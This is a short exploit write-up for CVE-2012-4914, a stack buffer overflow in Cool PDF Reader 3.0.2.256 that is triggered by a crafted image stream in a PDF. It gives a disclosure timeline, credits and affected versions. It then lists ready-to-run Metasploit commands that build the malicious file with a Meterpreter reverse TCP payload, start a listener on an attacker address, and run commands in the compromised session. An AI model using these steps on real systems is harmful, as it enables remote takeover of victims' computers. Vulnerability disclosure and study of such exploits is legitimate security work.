Timeline :

Vulnerability discovered and reported to Secunia by Francis Provencher the 2012-12-19
Vulnerability publicly disclosed by Francis Provencher the 2013-01-18
Metasploit PoC provided the 2013-03-17

PoC provided by :

Francis Provencher
Chris Gabriel
juan vazquez

Reference(s) :

CVE-2012-4914
OSVDB-89349

Affected version(s) :

Cool PDF Reader equal or prior to version 3.0.2.256

Tested on Windows XP Pro SP3 with :

Cool PDF Reader 3.0.2.256

Description :

This module exploits a stack buffer overflow in Cool PDF Reader equal or prior to version 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that contains a specially crafted image stream. This module has been tested successfully on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.

Commands :

use exploit/windows/fileformat/coolpdf_image_stream_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit -j

sysinfo
getuid